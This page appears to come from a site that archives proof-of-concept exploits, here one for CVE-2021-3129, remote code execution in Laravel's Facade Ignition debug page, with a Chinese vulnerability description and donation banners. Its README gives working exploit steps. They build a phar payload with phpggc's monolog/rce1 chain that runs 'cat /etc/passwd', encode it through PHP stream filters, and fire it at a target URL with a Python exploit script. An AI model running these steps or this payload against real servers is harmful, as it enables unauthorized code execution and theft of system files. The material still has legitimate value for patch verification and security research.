Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2021-3129 PoC — Facade Ignition for Laravel 授权问题漏洞

Source
Associated Vulnerability
Title:Facade Ignition for Laravel 授权问题漏洞 (CVE-2021-3129)
Description:Facade Ignition for Laravel是比利时Facade公司的一款运行在Laravel Web框架中的可自定义的错误页面。 Ignition for Laravel 2.5.2之前版本存在授权问题漏洞,该漏洞源于程序未进行正确的身份验证,攻击者可利用该漏洞执行任意代码。
Description
CVE-2021-3129-Laravel Debug mode
Readme
# CVE-2021-3129

```
生成自定义命令的phar包:
php -d'phar.readonly=0' ./phpggc monolog/rce1 system "cat /etc/passwd" --phar phar -o php://output | base64 -w0

php -a 进入php命令行环境
$fp = fopen('php://output', 'w');
stream_filter_append($fp, 'convert.quoted-printable-encode');
$size = "";
fwrite($fp, iconv('utf-8','utf-16le',$size));

将生成好的payload保存为一个文件,然后利用脚本指定:
python laravel.py --url "http(s)://192.168.0.109:8000/" --phar test.phar
```
File Snapshot

[4.0K] /data/pocs/3945f45f9a7d4830aa1e86e04fc9d5af257d35f0 ├── [ 13K] laravel-CVE-2021-3129.py ├── [ 507] README.md └── [4.2K] test.phar 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.